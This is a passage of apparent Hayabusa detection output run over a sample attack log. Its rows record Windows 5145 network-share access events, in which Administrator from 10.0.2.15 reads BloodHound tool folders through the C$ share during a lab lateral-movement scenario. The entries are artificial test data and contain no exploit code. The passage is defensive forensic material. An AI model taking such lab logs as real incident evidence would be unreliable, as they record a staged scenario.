0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.648 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fs.realpath | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.648 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.648 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.648 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.658 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\glob | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.658 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graceful-fs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.668 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.668 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.668 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.678 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\alg | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.678 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\data | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.678 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.678 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules\lodash | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.688 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.688 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name\.nyc_output | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.688 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.688 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.698 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.698 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.698 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-type | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.698 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\imurmurhash | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.708 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inflight | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.708 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inherits | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.708 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.708 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.718 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.718 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.718 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\static | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.718 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.728 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\invariant | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.728 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\isarray | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.728 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-obj | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.738 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-zip-file | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.738 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.738 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.738 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.748 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external\sizzle | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.748 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.748 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\ajax | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.748 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\attributes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.758 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\core | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.758 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\css | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.758 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\data | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.758 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\deferred | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.768 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\effects | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.768 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\event | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.768 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\exports | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.768 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\manipulation | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.768 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\queue | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.778 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\traversing | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.778 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\var | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.778 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\js-tokens | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.778 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jszip | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.778 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.788 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.788 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\test | IP Addr: 10.0.2.15 | LID: 